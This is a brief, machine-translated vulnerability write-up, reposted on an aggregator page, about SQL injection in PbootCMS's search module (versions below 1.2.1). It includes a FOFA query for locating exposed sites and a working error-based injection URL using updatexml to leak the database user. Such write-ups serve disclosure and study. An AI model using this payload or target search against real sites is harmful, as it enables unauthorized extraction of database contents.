当前位置:网站首页>Pbootcms search SQL injection vulnerability

Pbootcms search SQL injection vulnerability

2022-07-19 15:22:00 Lonely and lazy contract

Vulnerability description

i PbootCMS Search module exists SQL Inject holes . Through the vulnerability, sensitive information of the database can be obtained

Holes affect

s PbootCMS < 1.2.1

Space mapping

d FOFA:app="PBOOTCMS"

Loophole recurrence

  • The search box page is
     Insert picture description here

  • Payload by

/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)

 Insert picture description here

My personal blog

https://gylq.gitee.io/time/

原网站

版权声明
本文为[Lonely and lazy contract]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/200/202207172317364144.html